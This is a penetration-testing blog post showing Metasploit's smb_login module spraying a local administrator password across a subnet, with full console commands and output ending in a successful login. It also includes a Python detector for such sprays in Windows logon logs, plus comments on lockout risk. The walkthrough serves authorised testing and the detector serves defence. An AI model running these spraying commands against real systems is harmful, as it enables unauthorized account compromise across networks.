Testing Windows Passwords with Metasploit

An attacker will take the path of least resistance in order to gain access to critical systems and data. During a penetration test we’ll take the same tactic as well.

Frequently this is accomplished by guessing the password to a user's account and then either using that account's privileges to reach critical data or escalating it to an administrator- or root-level account. Once credentials have been acquired for one host, you'll want to determine which other systems they work against. It is fairly common, for example, to gain access to a local administrator account on a workstation or server but not to a domain account; in that case you will want to try that local administrator account against a whole slew of other systems.

There are a number of ways to accomplish this task, but one of the most efficient is the smb_login module of Metasploit Framework 4, which tests a single username/password combination against a lot of boxes very quickly.

msf > use auxiliary/scanner/smb/smb_login
msf  auxiliary(smb_login) > set smbpass Password!
smbpass => Password!
msf  auxiliary(smb_login) > set smbuser administrator
smbuser => administrator
msf  auxiliary(smb_login) > set user_as_pass false
user_as_pass => false
msf  auxiliary(smb_login) > set rhosts 10.0.0.100-110
rhosts => 10.0.0.100-110
msf  auxiliary(smb_login) > show options
Module options (auxiliary/scanner/smb/smb_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   true             no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   PASS_FILE                          no        File containing passwords, one per line
   PRESERVE_DOMAINS  true             no        Respect a username that contains a domain name.
   RHOSTS            10.0.0.100-110   yes       The target address range or CIDR identifier
   RPORT             445              yes       Set the SMB service port
   SMBDomain         WORKGROUP        no        SMB Domain
   SMBPass           Password!        no        SMB Password
   SMBUser           administrator    no        SMB Username
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      true             no        Try the username as the password for all users
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts
msf  auxiliary(smb_login) > exploit

[*] 10.0.0.100:445 SMB - Starting SMB login bruteforce
[*] 10.0.0.101:445 SMB - Starting SMB login bruteforce
[*] Scanned 02 of 11 hosts (018% complete)
[*] 10.0.0.102:445 SMB - Starting SMB login bruteforce
[*] Scanned 03 of 11 hosts (027% complete)
[*] 10.0.0.103:445 SMB - [1/2] - Starting SMB login bruteforce
[*] Scanned 04 of 11 hosts (036% complete)
[*] 10.0.0.104:445 SMB - [1/2] - Starting SMB login bruteforce
[*] Scanned 05 of 11 hosts (045% complete)
[*] 10.0.0.105:445 SMB - [1/2] - Starting SMB login bruteforce
[*] Scanned 06 of 11 hosts (054% complete)
[*] 10.0.0.106:445 SMB - [1/2] - Starting SMB login bruteforce
[*] Scanned 07 of 11 hosts (063% complete)
[*] 10.0.0.107:445 SMB - [1/2] - Starting SMB login bruteforce
[*] 10.0.0.107:445 SMB - [1/2] - |WORKGROUP - FAILED LOGIN (Windows 5.1) administrator :  (STATUS_LOGON_FAILURE)
[+] 10.0.0.107:445|WORKGROUP - SUCCESSFUL LOGIN (Windows 5.1) 'administrator' : 'Password!'
[*] Scanned 08 of 11 hosts (072% complete)
[*] 10.0.0.108:445 SMB - [1/2] - Starting SMB login bruteforce
[*] Scanned 09 of 11 hosts (081% complete)
[*] 10.0.0.109:445 SMB - [1/2] - Starting SMB login bruteforce
[*] Scanned 10 of 11 hosts (090% complete)
[*] 10.0.0.110:445 SMB - [1/2] - Starting SMB login bruteforce
[*] Scanned 11 of 11 hosts (100% complete)
[*] Auxiliary module execution completed
msf  auxiliary(smb_login) >

In this example I successfully compromised one of my test systems, which was using the password ‘Password!’ for the local administrator account. This may seem far-fetched, but I’ve seen worse than this before on engagements.

Be aware that this type of activity is very noisy and easily detectable by a sysadmin or security goon, as it will create a failed login attempt for the Administrator account on every machine in the subnet.
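From the defender's side, the footprint just described (one account failing to log on to many hosts from one source within seconds, sometimes followed by a success) is easy to pick out of the Windows Security log. The following is an added example, not code from the original post: a small sweep detector run over constructed records modelled on Windows events 4625 (failed logon) and 4624 (successful logon) with logon type 3 (network). The pipe-delimited line format, the host names and the 10.0.0.50 source address are assumptions made for the example.

```python
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed sample records modelled on Windows Security log events:
# 4625 = failed logon, 4624 = successful logon, logon type 3 = network (SMB).
# Assumed line format: timestamp|event_id|target_host|account|source_ip|logon_type
SAMPLE_EVENTS = """\
2012-03-01T10:00:01|4625|WS100|administrator|10.0.0.50|3
2012-03-01T10:00:02|4625|WS101|administrator|10.0.0.50|3
2012-03-01T10:00:03|4625|WS102|administrator|10.0.0.50|3
2012-03-01T10:00:04|4625|WS103|administrator|10.0.0.50|3
2012-03-01T10:00:05|4625|WS104|administrator|10.0.0.50|3
2012-03-01T10:00:06|4625|WS107|administrator|10.0.0.50|3
2012-03-01T10:00:06|4624|WS107|administrator|10.0.0.50|3
2012-03-01T09:15:00|4625|WS103|jsmith|10.0.0.77|3
"""

def parse_events(text):
    """Parse the constructed records into dicts, oldest first."""
    events = []
    for line in filter(str.strip, text.splitlines()):
        ts, eid, host, acct, src, ltype = line.split("|")
        events.append({"ts": datetime.fromisoformat(ts), "id": int(eid), "host": host,
                       "account": acct.lower(), "src": src, "type": int(ltype)})
    return sorted(events, key=lambda e: e["ts"])

def detect_spray(events, window=timedelta(minutes=5), min_hosts=5, lockout=3):
    """Flag a (source_ip, account) pair whose network logons fail on at least
    min_hosts distinct hosts inside `window`: the footprint of one password tried
    across a subnet. Also list hosts where that pair then succeeded and hosts
    where per-host failures reached the lockout threshold."""
    by_pair = defaultdict(list)
    for e in events:
        if e["type"] == 3 and e["id"] in (4624, 4625):
            by_pair[(e["src"], e["account"])].append(e)
    findings = []
    for (src, acct), evs in by_pair.items():
        fails = [e for e in evs if e["id"] == 4625]
        for i, first in enumerate(fails):
            end = first["ts"] + window
            per_host = Counter(e["host"] for e in fails[i:] if e["ts"] <= end)
            if len(per_host) < min_hosts:
                continue
            findings.append({
                "src": src, "account": acct, "hosts_failed": sorted(per_host),
                "succeeded_on": sorted({e["host"] for e in evs if e["id"] == 4624
                                        and first["ts"] <= e["ts"] <= end}),
                "lockout_risk": sorted(h for h, n in per_host.items() if n >= lockout)})
            break  # one finding per pair is enough to raise an alert
    return findings
```

Because each host sees only one or two failures, the single-host lockout counters that the comments below discuss never trip; the signal is the distinct-host count per source and account, which is why the detector keys on that rather than on failures per host.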

Posted on by Mark Marshall in Main

2 Responses to Testing Windows Passwords with Metasploit

  1. Mark Marshall

    A brute-force attack or an aggressive password guessing attack is very noisy and will likely lock out user accounts depending on how the group policies for that domain have been configured. This post was about trying 2 passwords (username as the password, as well as Password!) quickly against an entire subnet of hosts.
    This tactic has a very low probability of locking any accounts out given that even the most restrictive lockout policies are generally 3 failed attempts in x minutes.

  2. Simon

    So brute-forcing Windows accounts isn’t generally a very good idea due to lockout settings and the possibility of creating a denial-of-service condition. Most Windows networks have group policies that enforce a lockout of X minutes after Y failed attempts. As such, brute-force attacks are pretty much too risky…